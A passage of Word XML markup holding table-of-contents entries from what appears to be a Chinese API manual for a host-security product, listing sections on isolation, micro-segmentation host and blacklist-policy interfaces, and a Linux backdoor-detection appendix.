                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166286 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>387</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A315DEE" w14:textId="2E6E062F" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166287" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5 解除隔离接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166287 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>388</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62ED5A1C" w14:textId="18AF1659" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166288" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6 删除隔离接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>389</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46A6DE88" w14:textId="6AA45A64" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166289" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.7 重试接口隔离接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166289 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>390</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AB3D2A3" w14:textId="2512AB60" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166290" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11 微隔离主机管理接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166290 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>392</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FA478C7" w14:textId="5C73C77C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166291" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1 查询主机列表</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166291 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>392</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53BA41A9" w14:textId="14F915FF" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166292" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2 修改主机开关</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166292 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>396</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B75C24B" w14:textId="6FDD1338" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166293" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12 微隔离黑名单策略接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166293 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>398</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FAB7F2D" w14:textId="37857599" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166294" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.1 查询黑名单策略列表</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166294 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>398</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="513AC992" w14:textId="1D53842A" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166295" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2 创建黑名单策略</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166295 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5753D947" w14:textId="188DE5A1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166296" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.3 修改策略</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166296 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>406</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46C36092" w14:textId="030CA4ED" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166297" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.4 修改黑名单策略开关</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166297 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="505C8A78" w14:textId="2B86D003" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166298" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.5 删除策略接口</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166298 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>410</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0938F7BC" w14:textId="7A13252D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166299" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.6 查看策略主机范围</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166299 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>411</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6984AE7A" w14:textId="7A103DD4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166300" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.7 查看策略详情</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166300 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>414</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22266D97" w14:textId="6B9D912E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166301" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13 附录1 Linux后门检测-查询结果-detail数据结构</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166301 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>419</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37470994" w14:textId="6469E472" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166302" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
